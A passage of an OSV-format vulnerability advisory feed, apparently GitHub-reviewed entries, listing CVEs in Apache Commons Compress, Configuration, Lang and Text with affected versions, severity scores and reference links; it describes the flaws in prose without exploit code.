"https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/6" } ], "database_specific": { "cwe_ids": [ "CWE-130" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T19:37:10Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xqfj-vm6h-2x34", "published": "2021-08-02T16:55:39Z", "modified": "2024-03-08T05:19:25.295269Z", "aliases": [ "CVE-2021-35517" ], "summary": "Improper Handling of Length Parameter Inconsistency in Compress", "details": "When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-xqfj-vm6h-2x34/GHSA-xqfj-vm6h-2x34.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35517" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra393ffdc7c90a4a37ea023946f390285693795013a642d80fba20203@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r605d906b710b95f1bbe0036a53ac6968f667f2c249b6fbabada9a940%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54afdab05e01de970649c2d91a993f68a6b00cd73e6e34e16c832d46@%3Cuser.ant.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r457b2ed564860996b20d938566fe8bd4bfb7c37be8e205448ccb5975@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31f75743ac173b0a606f8ea6ea53f351f386c44e7bcf78ae04007c29@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/5" } ], "database_specific": { "cwe_ids": [ "CWE-130", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T18:12:57Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7qx4-pp76-vrqh", "published": "2020-05-21T19:08:08Z", "modified": "2023-11-08T04:02:46.926629Z", "aliases": [ "CVE-2020-1953" ], "summary": "Remote code execution in Apache Commons Configuration", "details": "Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. Apache Commons Configuration versions 2.2, 2.3, 2.4, 2.5, 2.6 did not change the default settings of this library. So if a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2" }, { "fixed": "2.7" } ] } ], "versions": [ "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-7qx4-pp76-vrqh/GHSA-7qx4-pp76-vrqh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1953" }, { "type": "WEB", "url": "https://github.com/apache/commons-configuration/commit/add7375cf37fd316d4838c6c56b054fc293b4641" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16a2e949e35780c8974cf66104e812410f3904f752df6b66bf292269@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde2186ad6ac0d6ed8d51af7509244adcf1ce0f9a3b7e1d1dd3b64676@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-05-21T17:12:19Z", "nvd_published_at": "2020-03-13T15:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9w38-p64v-xpmv", "published": "2024-03-21T09:31:14Z", "modified": "2025-02-13T19:13:50.673769Z", "aliases": [ "CGA-4phw-5934-cp4w", "CVE-2024-29133" ], "related": [ "CGA-9pcx-658r-q6cc", "CGA-f8w3-v8cw-rc4q", "CGA-gxrv-2q36-c76g", "CGA-p5h5-jmpp-wgq6" ], "summary": "Apache Commons Configuration: StackOverflowError calling ListDelimiterHandler.flatten(Object, int) with a cyclical object tree", "details": "This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' calling 'ListDelimiterHandler.flatten(Object, int)' with a cyclical object tree.\nUsers are recommended to upgrade to version 2.10.1, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.10.1" } ] } ], "versions": [ "2.0", "2.1", "2.1.1", "2.10.0", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-9w38-p64v-xpmv/GHSA-9w38-p64v-xpmv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29133" }, { "type": "WEB", "url": "https://github.com/apache/commons-configuration/commit/43f4dab021e9acb8db390db2ae80aa0cee4f9ee4" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-841" }, { "type": "WEB", "url": "https://lists.apache.org/thread/ccb9w15bscznh6tnp3wsvrrj9crbszh2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNKDKEEKZNL5FGCTZKJ6CFXFVWFL5FJ7" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YD4AFTIIQW662LUAQRMWS6BBKYSZG3YS" }, { "type": "PACKAGE", "url": "apache/commons-configuration" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/20/3" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2024-03-21T18:59:08Z", "nvd_published_at": "2024-03-21T09:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xj57-8qj4-c4m6", "published": "2022-07-07T00:00:26Z", "modified": "2024-02-17T05:33:18.672687Z", "aliases": [ "CVE-2022-33980" ], "summary": "Code injection in Apache Commons Configuration", "details": "Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.4" }, { "fixed": "2.8.0" } ] } ], "versions": [ "2.4", "2.5", "2.6", "2.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-xj57-8qj4-c4m6/GHSA-xj57-8qj4-c4m6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33980" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-configuration/changes-report.html#a2.8.0" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-configuration" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-753" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-764" }, { "type": "WEB", "url": "https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0015" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5290" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/06/5" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/11/15/4" } ], "database_specific": { "cwe_ids": [ "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T16:56:07Z", "nvd_published_at": "2022-07-06T13:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xjp4-hw94-mvp5", "published": "2024-03-21T09:31:14Z", "modified": "2025-02-13T19:12:42.244592Z", "aliases": [ "CGA-6jvc-fmj8-g22f", "CVE-2024-29131" ], "related": [ "CGA-2v4p-jwqh-9wqp", "CGA-grw7-f4vj-7jvv", "CGA-pg3h-88pr-x67h", "CGA-qh6m-p54c-m273" ], "summary": "Apache Commons Configuration: StackOverflowError adding property in AbstractListDelimiterHandler.flattenIterator()", "details": "This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' when adding a property in 'AbstractListDelimiterHandler.flattenIterator()'.\nUsers are recommended to upgrade to version 2.10.1, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-configuration2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-configuration2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.10.1" } ] } ], "versions": [ "2.0", "2.1", "2.1.1", "2.10.0", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-xjp4-hw94-mvp5/GHSA-xjp4-hw94-mvp5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29131" }, { "type": "WEB", "url": "https://github.com/apache/commons-configuration/commit/56b5c4dcdffbde27870df5a3105d6a5f9b22f554" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-configuration" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/CONFIGURATION-840" }, { "type": "WEB", "url": "https://lists.apache.org/thread/03nzzzjn4oknyw5y0871tw7ltj0t3r37" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNKDKEEKZNL5FGCTZKJ6CFXFVWFL5FJ7" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YD4AFTIIQW662LUAQRMWS6BBKYSZG3YS" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241213-0001" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/20/4" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2024-03-21T18:58:52Z", "nvd_published_at": "2024-03-21T09:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j288-q9x7-2f5v", "published": "2025-07-11T15:31:37Z", "modified": "2025-11-05T20:34:04.566048Z", "aliases": [ "CVE-2025-48924" ], "related": [ "CGA-22cr-f3cr-c7cm", "CGA-29x5-f7v5-rrg6", "CGA-2fmr-p6rq-h6gj", "CGA-48h5-566h-rvpp", "CGA-4fcv-jq36-r7hx", "CGA-523g-m72h-8798", "CGA-6pxc-gq99-gpx4", "CGA-6v52-24xf-x875", "CGA-78fw-62xf-9rm8", "CGA-7r2r-4fw7-h3qv", "CGA-8c99-22mx-hg38", "CGA-8w2x-v747-c9c7", "CGA-8x43-fp55-w32w", "CGA-9j28-2jv5-qv67", "CGA-9rcm-4h29-rv8h", "CGA-ff3x-mc4g-82q2", "CGA-g3gg-7c6f-x6qx", "CGA-hj53-w7gr-6f9r", "CGA-j6cx-9v8j-x9cc", "CGA-j84p-prch-g8wm", "CGA-j8w2-rj92-x353", "CGA-j93m-mcxv-7hxr", "CGA-jvxv-2xch-6xjm", "CGA-m7pc-jwx3-vm7v", "CGA-mhg4-342v-w7xq", "CGA-mp4q-mrjj-8862", "CGA-p7fm-p736-2fmc", "CGA-p87f-qfxg-x45v", "CGA-pxx2-65vr-8cc4", "CGA-rc28-932p-89cv", "CGA-v52f-47gw-2xcm", "CGA-vxhq-8vpg-mr2p" ], "summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs", "details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.\n\nThe methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-lang3", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-lang3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "3.18.0" } ] } ], "versions": [ "3.0", "3.0.1", "3.1", "3.10", "3.11", "3.12.0", "3.13.0", "3.14.0", "3.15.0", "3.16.0", "3.17.0", "3.2", "3.2.1", "3.3", "3.3.1", "3.3.2", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } }, { "package": { "name": "commons-lang:commons-lang", "ecosystem": "Maven", "purl": "pkg:maven/commons-lang/commons-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "last_affected": "2.6" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924" }, { "type": "WEB", "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-lang" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-12T00:48:03Z", "nvd_published_at": "2025-07-11T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-599f-7c49-w659", "published": "2022-10-13T19:00:17Z", "modified": "2024-02-16T08:09:06.872889Z", "aliases": [ "CVE-2022-42889" ], "summary": "Arbitrary code execution in Apache Commons Text", "details": "Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.", "affected": [ { "package": { "name": "org.apache.commons:commons-text", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-text" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.5" }, { "fixed": "1.10.0" } ] } ], "versions": [ "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-599f-7c49-w659/GHSA-599f-7c49-w659.json" } }, { "package": { "name": "com.guicedee.services:commons-text", "ecosystem": "Maven", "purl": "pkg:maven/com.guicedee.services/commons-text" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.2.2.1-jre17" } ] } ], "versions": [ "0.70.0.1", "0.70.0.1-rc1", "0.70.0.1-rc13", "0.70.0.1-rc14", "0.70.0.1-rc15", "0.70.0.1-rc2", "0.70.0.1-rc3", "0.70.0.1-rc4", "0.70.0.1-rc5", "0.70.0.2", "0.70.0.3", "0.70.0.4", "0.70.0.5", "0.70.0.6", "0.70.0.7", "1.0.0.0", "1.0.1.0", "1.0.1.0-jre12", "1.0.1.0-jre13", "1.0.1.0-jre8", "1.0.1.1", "1.0.1.1-jre12", "1.0.1.1-jre13", "1.0.1.1-jre8", "1.0.1.2", "1.0.1.3", "1.0.1.3-jre12", "1.0.1.3-jre13", "1.0.1.3-jre8", "1.0.1.4", "1.0.1.4-jre12", "1.0.1.4-jre13", "1.0.1.4-jre8", "1.0.1.5", "1.0.1.5-jre12", "1.0.1.5-jre13", "1.0.1.5-jre8", "1.0.1.6", "1.0.1.6-jre12", "1.0.1.6-jre13", "1.0.1.7", "1.0.1.7-jre12", "1.0.1.7-jre13", "1.0.1.7-jre8", "1.0.10.0", "1.0.10.0-jre13", "1.0.10.0-jre14", "1.0.10.1", "1.0.10.1-jre14", "1.0.10.3", "1.0.10.3-jre14", "1.0.10.4", "1.0.10.4-jre12", "1.0.10.4-jre13", "1.0.10.4-jre14", "1.0.11.0-jre14", "1.0.11.2-jre14", "1.0.11.5", "1.0.11.5-jre12", "1.0.11.5-jre14", "1.0.11.6-jre14", "1.0.11.7", "1.0.11.7-jre12", "1.0.11.7-jre14", "1.0.12.0", "1.0.12.0-jre12", "1.0.12.0-jre13", "1.0.12.0-jre14", "1.0.12.0-jre8", "1.0.12.1", "1.0.12.1-jre12", "1.0.12.1-jre14", "1.0.12.2", "1.0.12.2-jre12", "1.0.12.2-jre14", "1.0.12.3", "1.0.12.3-jre12", "1.0.12.3-jre13", "1.0.12.3-jre14", "1.0.12.4", "1.0.12.4-jre12", "1.0.12.4-jre13", "1.0.12.4-jre14", "1.0.12.4-jre8", "1.0.12.5", "1.0.12.5-jre14", "1.0.13.0", "1.0.13.0-jre12", "1.0.13.0-jre13", "1.0.13.0-jre14", "1.0.13.0-jre8", "1.0.13.1", "1.0.13.1-jre13", "1.0.13.1-jre14", "1.0.13.1-jre8", "1.0.13.2", "1.0.13.2-jre12", "1.0.13.2-jre13", "1.0.13.2-jre14", "1.0.13.2-jre8", "1.0.13.3", "1.0.13.3-jre14", "1.0.13.4", "1.0.13.4-jre12", "1.0.13.4-jre13", "1.0.13.4-jre14", "1.0.13.5", "1.0.13.5-jre12", "1.0.13.5-jre14", "1.0.13.5-jre8", "1.0.14.0-RC1-jre14", "1.0.14.0-RC1-jre8", "1.0.14.1", "1.0.14.1-jre12", "1.0.14.1-jre13", "1.0.14.1-jre14", "1.0.14.1-jre8", "1.0.14.3-jre8", "1.0.14.4-jre14", "1.0.14.4-jre8", "1.0.15.1", "1.0.15.1-jre12", "1.0.15.1-jre13", "1.0.15.1-jre14", "1.0.15.1-jre8", "1.0.15.2", "1.0.15.2-jre12", "1.0.15.2-jre14", "1.0.15.2-jre8", "1.0.15.3-jre14", "1.0.15.3-jre8", "1.0.15.4", "1.0.15.4-jre14", "1.0.15.4-jre8", "1.0.15.5", "1.0.15.5-jre14", "1.0.15.5-jre8", "1.0.16.0", "1.0.16.0-jre14", "1.0.16.0-jre8", "1.0.17.0", "1.0.17.0-jre14", "1.0.17.1", "1.0.17.1-jre14", "1.0.17.1-jre8", "1.0.18.0", "1.0.18.0-jre14", "1.0.18.0-jre15", "1.0.18.0-jre8", "1.0.18.1", "1.0.18.1-jre14", "1.0.18.1-jre15", "1.0.18.1-jre8", "1.0.19.0", "1.0.19.0-jre14", "1.0.19.0-jre15", "1.0.19.1", "1.0.19.1-jre12", "1.0.19.1-jre13", "1.0.19.1-jre14", "1.0.19.1-jre15", "1.0.19.1-jre8", "1.0.19.10", "1.0.19.10-jre12", "1.0.19.10-jre14", "1.0.19.10-jre15", "1.0.19.10-jre8", "1.0.19.11", "1.0.19.11-jre14", "1.0.19.11-jre8", "1.0.19.12-jre14", "1.0.19.12-jre8", "1.0.19.13", "1.0.19.13-jre14", "1.0.19.13-jre15", "1.0.19.13-jre8", "1.0.19.2", "1.0.19.2-jre13", "1.0.19.2-jre14", "1.0.19.2-jre15", "1.0.19.2-jre8", "1.0.19.3", "1.0.19.3-jre13", "1.0.19.3-jre14", "1.0.19.3-jre15", "1.0.19.3-jre8", "1.0.19.4", "1.0.19.4-jre14", "1.0.19.4-jre15", "1.0.19.4-jre8", "1.0.19.5", "1.0.19.5-jre14", "1.0.19.5-jre15", "1.0.19.5-jre8", "1.0.19.6", "1.0.19.6-jre14", "1.0.19.6-jre8", "1.0.19.7-jre14", "1.0.19.7-jre8", "1.0.19.8-jre8", "1.0.19.9", "1.0.19.9-jre13", "1.0.19.9-jre14", "1.0.19.9-jre15", "1.0.19.9-jre8", "1.0.2.0", "1.0.2.0-jre12", "1.0.2.0-jre13", "1.0.2.0-jre8", "1.0.2.1", "1.0.2.1-jre12", "1.0.2.1-jre13", "1.0.2.10", "1.0.2.10-jre12", "1.0.2.10-jre13", "1.0.2.11", "1.0.2.11-jre13", "1.0.2.12", "1.0.2.12-jre13", "1.0.2.13", "1.0.2.13-jre13", "1.0.2.14", "1.0.2.14-jre13", "1.0.2.15", "1.0.2.15-jre13", "1.0.2.16-jre13", "1.0.2.17-jre13", "1.0.2.18", "1.0.2.18-jre12", "1.0.2.18-jre13", "1.0.2.2", "1.0.2.2-jre12", "1.0.2.2-jre13", "1.0.2.2-jre8", "1.0.2.3", "1.0.2.3-jre12", "1.0.2.3-jre13", "1.0.2.3-jre8", "1.0.2.4", "1.0.2.4-jre12", "1.0.2.4-jre13", "1.0.2.6-jre13", "1.0.2.7-jre12", "1.0.2.7-jre13", "1.0.2.8", "1.0.2.8-jre12", "1.0.2.8-jre13", "1.0.2.9-jre12", "1.0.2.9-jre13", "1.0.20.0", "1.0.20.0-jre14", "1.0.20.0-jre15", "1.0.20.0-jre8", "1.0.20.1", "1.0.20.1-jre14", "1.0.20.1-jre15", "1.0.20.1-jre8", "1.0.20.2", "1.0.20.2-jre14", "1.0.20.2-jre15", "1.0.20.2-jre8", "1.0.3.1-jre13", "1.0.3.2", "1.0.3.2-jre13", "1.0.3.3", "1.0.3.3-jre12", "1.0.3.3-jre13", "1.0.4.1-jre13", "1.0.4.2", "1.0.4.2-jre13", "1.0.4.3-jre13", "1.0.4.4", "1.0.4.4-jre13", "1.0.5.0", "1.0.5.0-jre13", "1.0.5.1", "1.0.5.1-jre12", "1.0.5.1-jre13", "1.0.5.2", "1.0.5.2-jre12", "1.0.5.2-jre13", "1.0.5.3", "1.0.5.3-jre12", "1.0.5.3-jre13", "1.0.5.4-jre13", "1.0.5.4-jre14", "1.0.5.5", "1.0.5.5-jre12", "1.0.5.5-jre13", "1.0.5.5-jre14", "1.0.6.1", "1.0.6.1-jre12", "1.0.6.1-jre13", "1.0.6.1-jre14", "1.0.6.2", "1.0.6.2-jre12", "1.0.6.2-jre13", "1.0.6.2-jre14", "1.0.6.3", "1.0.6.3-jre12", "1.0.6.3-jre13", "1.0.6.3-jre14", "1.0.6.4-jre14", "1.0.6.5", "1.0.6.5-jre12", "1.0.6.5-jre13", "1.0.6.5-jre14", "1.0.6.7", "1.0.6.7-jre14", "1.0.7.0", "1.0.7.0-jre12", "1.0.7.0-jre13", "1.0.7.0-jre14", "1.0.7.1", "1.0.7.1-jre13", "1.0.7.1-jre14", "1.0.7.10", "1.0.7.10-jre13", "1.0.7.10-jre14", "1.0.7.11", "1.0.7.11-jre14", "1.0.7.12", "1.0.7.12-jre12", "1.0.7.12-jre13", "1.0.7.12-jre14", "1.0.7.2-jre14", "1.0.7.3", "1.0.7.3-jre13", "1.0.7.3-jre14", "1.0.7.4", "1.0.7.4-jre14", "1.0.7.5", "1.0.7.5-jre14", "1.0.7.6", "1.0.7.6-jre14", "1.0.7.9", "1.0.7.9-jre14", "1.0.8.1", "1.0.8.1-jre14", "1.0.8.12", "1.0.8.12-jre12", "1.0.8.12-jre14", "1.0.8.16", "1.0.8.16-jre14", "1.0.8.18", "1.0.8.18-jre14", "1.0.8.2", "1.0.8.2-jre13", "1.0.8.2-jre14", "1.0.8.3", 